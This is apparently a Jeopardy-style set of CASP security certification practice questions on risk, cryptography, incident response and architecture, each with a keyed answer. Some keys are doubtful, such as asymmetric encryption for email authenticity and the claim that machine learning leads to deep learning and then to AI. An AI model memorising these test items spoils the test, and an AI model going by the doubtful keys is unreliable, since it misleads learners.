Risk Management
Cryptography & PKI
Incident Response & Forensics
Security Architecture
General CASP Knowledge
100

Which of the following is the formula for SLE (Single Loss Expectancy)?

A. SLE = AV (Asset Value) × EF (Exposure Factor)

B. SLE = AV / EF

C. SLE = ARO (Annual Rate of Occurance) × EF

D. SLE = ARO × AV

A. SLE = AV (Asset Value) × EF (Exposure Factor)

100

You have been asked by a member of senior management to explain the importance of encryption and define what symmetric encryption offers. Which of the following offers the best explanation?

A. Nonrepudiation

B. Confidentiality

C. Hashing

D. Privacy and authentication

B. Confidentiality

100

During the lessons learned, your team is conducting an analysis of the incident playbook. What would best mitigate and manage the effects of an incident?

A. Modifying the scenario the risk is based on

B. Developing an agenda for recovery

C. Choosing the members of the recovery team

D. Implementing procedural controls

D. Implementing procedural controls

100

Sally’s CISO asked her to recommend an intrusion system to recognize intrusions traversing the network and send email alerts to the IT staff when one is detected. What type of intrusion system does the CISO want?

A. HIDS

B. NIDS

C. HIPS

D. NIPS

B. NIDS

100

Your DevOps team decided to use containers because they allow running applications on any hardware. What is the first thing your team should do to have a secure container environment?

A. Install IPS.

B. Lock down Kubernetes and monitor registries.

C. Configure antimalware and traffic filtering.

D. Disable services that are not required and install monitoring tools.

D. Disable services that are not required and install monitoring tools.

200

Which of the following is not an advantage of qualitative risk assessments?

A. Speed

B. Use of numeric dollar values

C. Based on CIA

D. Performed by a team

B. Use of numeric dollar values

200

A co-worker is concerned about the veracity of a claim because the sender of an email denies sending it. The co-worker wants a way to prove the authenticity of an email. Which would you recommend?

A. Hashing

B. Digital signature

C. Symmetric encryption

D. Asymmetric encryption

D. Asymmetric encryption

200

After an incident, it is important for you to create a lessons learned document. By conducting this critique, you evaluate the effectiveness of the response. With that after-incident mindset, what is the most important result you can derive from this document?

A. Areas for improvement

B. Magnitude of the problem

C. Proper assessment of an incident

D. Security assessment awareness

A. Areas for improvement

200

**DAILY DOUBLE**

The IT department decided to implement a security appliance in front of their web servers to inspect HTTP/HTTPS/SOAP traffic for malicious activity. Which of the following is the BEST solution to use?

A. Screened host firewall

B. Packet filter firewall

C. DMZ

D. WAF (Web Application Firewall)

D. WAF (Web Application Firewall)

200

The Hardware Security Module (HSM) and the Trusted Platform Module (TPM) provide what hardening technique?

A. Hard drive encryption

B. Trusted user authentication

C. Portable drive encryption

D. Protection against buffer overflow

A. Hard drive encryption

300

Implementation of a firewall best maps to which of the following?

A. Accept

B. Avoid

C. Mitigate

D. Transfer

C. Mitigate

300

You’ve discovered that an expired certificate is being used repeatedly to gain logon privileges. To what list should the certificate have been added?

A. Wildcard verification

B. Expired key revocation list

C. Online Certificate Status Department

D. Certificate revocation list (CRL)

D. Certificate revocation list (CRL)

300

Your company has a fence around the perimeter of its datacenter. A light sensor is connected to the fence and trips an alarm whenever something impacts the fence or the sensor detects movement and automatically records it on video. The datacenter is located in an area with tumbleweeds that often impact the fence in the fall, causing alarm fatigue. In this scenario, what alert type is causing alarm fatigue?

A. True positive

B. True negative

C. False positive

D. False negative

C. False positive

300

Your employees need internal access while traveling to remote locations. You need a service that enables them to securely connect back to a private corporate network from a public network to log into a centralized portal. You want the traffic to be encrypted. Which of the following is the BEST tool?

A. Wi-Fi

B. VPN (Virtual Private Network)

C. RDP (Remote Desktop Protocol)

D. NIC (Network Interface Card)

B. VPN (Virtual Private Network)

300

Olivia is the senior security analyst for a large online news organization. She was briefed by the incident response team that the organization has fallen victim to an XSS attack and malicious web scripting code had executed in a trusted web page. What does she do to prevent this from happening in the future?

A. Make sure the web application can validate and sanitize input.

B. Implement patch management immediately.

C. Request an external penetration test.

D. There is no way to prevent this from happening on a publicly facing web server.

A. Make sure the web application can validate and sanitize input.

400

A(n) ___________________ is any agent, condition, or circumstance that could potentially cause harm to, loss of, or damage to an IT asset or data asset, or compromise it.

A. Vulnerability

B. Risk

C. Threat

D. Exposure

C. Threat

400

Which of the following is not an advantage of symmetric encryption?

A. It’s powerful.

B. A small key works well for bulk encryption.

C. It offers confidentiality.

D. Key exchange is easy.

D. Key exchange is easy.

400

Your breached organization is in the middle of an investigation, gathering evidence, performing forensics, and giving a presentation to upper management of all the proof gathered. What is the organization’s next action after all the technical incident forensics are completed?

A. Schedule a press conference.

B. Notify the authorities.

C. Notify all your vendors.

D. File for cyber-insurance

coverage.

B. Notify the authorities.

400

After merging with a newly acquired company, Gavin comes to work Monday morning to find a metamorphic worm from the newly acquired network spreading through the parent organization. The security administrator isolated the worm using a network tap mirroring all the new network traffic and found it spreading on TCP port 445. What should Gavin advise the administrator to do to immediately to minimize the attack?

A. Run Wireshark to watch for traffic on TCP port 445.

B. Update antivirus software and scan the entire enterprise.

C. Check your SIEM for alerts for any asset with TCP port 445 open.

D. Deploy an ACL to all HIPS: DENY-TCP-ANY-ANY-445.

D. Deploy an ACL to all HIPS: DENY-TCP-ANY-ANY-445.

400

You want your organization to benefit from artificial intelligence, but some in the application development department are confused about what AI actually is. Which statement is true? 

A. Artificial intelligence and machine learning are the same.

B. Machine learning and deep learning are the same.

C. Machine learning leads to deep learning, which leads to artificial intelligence.

D. Artificial intelligence parses big data to make decisions.

C. Machine learning leads to deep learning, which leads to artificial intelligence.

500

Which of the following types of testing is best described as manually performing the recovery

steps without causing any real disruption?

A. Full interruption test

B. Checklist

C. Walk-through test

D. Simulation test

C. Walk-through test

500

3DES ECB is an example of which of the following?

A. Disk encryption

B. Block encryption

C. Port encryption

D. Record encryption

B. Block encryption

500

An attacker who compromised your network was caught and is being prosecuted. The logs from various pieces of equipment showing the attacker’s actions are one of the key pieces of evidence. When the logs were examined, it was determined that the timestamps are inaccurate and off by years. What is likely to happen to the logs as related to the prosecution of the attacker?

A. The defense attorney will likely be given an opportunity to correct the timestamps.

B. The judge will likely enable a third party to correct the timestamps.

C. The company will likely be given an opportunity to correct the timestamps, making

them admissible in court.

D. The logs will likely not be allowed in court because the timestamps are incorrect.

D. The logs will likely not be allowed in court because the timestamps are incorrect.

500

You had your internal team do an analysis on compiled binaries to find errors in mobile and desktop applications. You would like an external agency to test them as well. Which of these tests BEST suits this need?

A. DAST (Dynamic Analysis Security Testing)

B. VAST (Vendor Application Security Testing)

C. IAST (Interactive Application Security Testing)

D. SAST (Static Analysis Security Testing)

C. IAST (Interactive Application Security Testing)

500

A vendor of new software that is deployed across your corporate network has announced a critical update is needed for a specific vulnerability. Your CIO wants to know what the vulnerability time has been. When can you give them that information?

A. After the patch is downloaded and installed in the affected system or device

B. When the patch is released and available to the public

C. When the patch is created by the vendor

D. When the vulnerability is discovered

A. After the patch is downloaded and installed in the affected system or device